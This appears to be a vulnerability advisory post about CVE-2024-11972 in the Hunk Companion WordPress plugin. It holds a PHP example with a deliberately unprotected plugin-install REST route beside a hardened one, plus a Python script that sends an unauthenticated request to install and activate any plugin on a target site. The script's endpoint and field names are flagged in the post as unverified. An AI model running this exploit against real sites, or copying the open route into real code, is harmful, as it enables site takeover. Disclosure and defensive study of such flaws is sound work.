The Hunk Companion WordPress plugin is a popular plugin for creating and customizing website designs and experiences. Versions before 1.9.0 suffer from a security vulnerability that allows unauthenticated installation and activation of arbitrary plugins from the WordPress.org repository, including plugins with known security issues. This post outlines the details of this vulnerability (CVE-2024-11972), provides a code snippet demonstrating the exploit, and links to original references for additional information.
Vulnerability Details
The vulnerability exists because the plugin does not correctly authorize some of its REST API endpoints: the permission check that should gate them accepts requests from anyone. This allows unauthenticated users to send requests that install and activate any plugin from the WordPress.org repository, even plugins that have known vulnerabilities and have been closed to new installations.
This vulnerability affects Hunk Companion WordPress plugin versions before 1.9.0. Websites running the plugin with these versions should urgently update to the latest version, which has patched this vulnerability.
Exploiting this vulnerability lets an attacker install and activate any plugin of their choosing, including plugins with known issues. In practice the attacker picks a plugin with a known, easily exploited bug and then uses that second bug against the site, so the outcome is usually full site compromise rather than just an unwanted plugin.
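To make the class of bug concrete, here is an added illustrative example, not the Hunk Companion plugin's own code: a plugin-install REST route whose permission_callback lets everyone through, next to a hardened version of the same route. The namespace example-plugin/v1, the route names, the slug parameter and the function names are assumptions made for the example; the WordPress functions used (register_rest_route, current_user_can, Plugin_Upgrader, activate_plugin) are real core APIs.

```php
<?php
/**
 * Added illustrative example (not Hunk Companion's own code). The namespace,
 * route names, parameter name and function names are assumptions.
 */

add_action( 'rest_api_init', function () {
    // Vulnerable: '__return_true' means every request, including an
    // unauthenticated POST from the internet, passes the authorization check
    // and reaches the install callback.
    register_rest_route( 'example-plugin/v1', '/plugin', array(
        'methods'             => 'POST',
        'callback'            => 'example_install_and_activate',
        'permission_callback' => '__return_true',
    ) );

    // Hardened: ask WordPress whether the *current user* may install and
    // activate plugins. For cookie-authenticated REST calls WordPress only sets
    // a current user when a valid X-WP-Nonce header is present; a bare POST
    // with no cookie and no nonce is treated as user 0 and fails this check.
    register_rest_route( 'example-plugin/v1', '/plugin-hardened', array(
        'methods'             => 'POST',
        'callback'            => 'example_install_and_activate',
        'permission_callback' => function () {
            if ( current_user_can( 'install_plugins' ) && current_user_can( 'activate_plugins' ) ) {
                return true;
            }
            return new WP_Error(
                'rest_forbidden',
                'You are not allowed to install plugins.',
                array( 'status' => rest_authorization_required_code() ) // 401 anonymous, 403 logged in
            );
        },
        'args' => array(
            'slug' => array(
                'required'          => true,
                'type'              => 'string',
                // Accept only a directory-style slug: no slashes, no URLs.
                'validate_callback' => function ( $value ) {
                    return is_string( $value ) && preg_match( '/^[a-z0-9-]{1,200}$/', $value ) === 1;
                },
            ),
        ),
    ) );
} );

/**
 * Install a plugin from the WordPress.org repository by slug and activate it.
 * The callback does no authorization of its own, so the route's
 * permission_callback is the only thing standing between the internet and
 * a plugin install on the site.
 */
function example_install_and_activate( WP_REST_Request $request ) {
    require_once ABSPATH . 'wp-admin/includes/plugin.php';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';

    $slug = $request->get_param( 'slug' );

    // Assumed package source for the example: the directory's download URL for
    // the latest release of a slug. The upgrader installs whatever zip it is
    // handed; it does not ask whether the plugin is closed or known-vulnerable.
    $package = 'https://downloads.wordpress.org/plugin/' . $slug . '.zip';

    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $package );
    if ( is_wp_error( $result ) ) {
        return $result;
    }
    if ( ! $result ) {
        return new WP_Error( 'install_failed', 'Plugin installation failed.', array( 'status' => 500 ) );
    }

    $plugin_file = $upgrader->plugin_info(); // e.g. "slug/slug.php"
    $activated   = activate_plugin( $plugin_file );
    if ( is_wp_error( $activated ) ) {
        return $activated;
    }

    return rest_ensure_response( array( 'installed' => $plugin_file, 'active' => true ) );
}
```

A quick check for any route like this: send a POST with no cookie and no X-WP-Nonce header and confirm the response is a 401 rest_forbidden error rather than a 200. The capability check belongs in permission_callback, not in the callback body, and it must not be something the client can satisfy by supplying its own parameters.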
Code Snippet
The following code snippet demonstrates the exploit, which lets an attacker install and activate an arbitrary plugin from the WordPress.org repository without authenticating:
import requests

# Replace these with the target website and the slug of the plugin to install.
# The endpoint path and the JSON field names below are as given in this post;
# verify them against the original advisory before relying on them.
target_website = "http://example.com"
target_plugin_slug = "vulnerable-hunk-companion-plugin"

# Craft the request payload
payload = {
    "slug": target_plugin_slug,
    "status": "install",
}

# Send the unauthenticated request to the REST API endpoint.
# No cookie and no X-WP-Nonce header are sent: the bug is that none is required.
response = requests.post(
    f"{target_website}/wp-json/hunk-companion/v1/plugin",
    json=payload,
    timeout=30,
)

if response.status_code == 200:
    print(f"Successfully installed and activated {target_plugin_slug}")
else:
    print(f"Failed to exploit the vulnerability (HTTP {response.status_code}): {response.text[:200]}")
An attacker customizes this script by setting target_website to the URL of the site they want to target and target_plugin_slug to the WordPress.org slug of the plugin they wish to install and activate.
Original References
For more details about CVE-2024-11972 and the Hunk Companion WordPress plugin vulnerability, you can consult the following original references:
- CVE-2024-11972 Vulnerability Details
- Hunk Companion WordPress Plugin Changelog
- WordPress.org Support Forum post discussing the issue
Conclusion
The discovery of CVE-2024-11972 in the Hunk Companion WordPress plugin highlights the importance of proper authorization on REST API endpoints: every route that performs a privileged action needs a permission_callback that actually checks the caller's capabilities. It serves as a reminder for developers to be diligent when implementing security checks in their plugins.
If you are using a version of the Hunk Companion WordPress plugin before 1.9.0, update to the latest version immediately to protect your website from attacks, and review the installed plugin list for anything you did not install yourself.
Timeline
Published on: 12/31/2024 06:15:23 UTC
Last modified on: 12/31/2024 19:15:07 UTC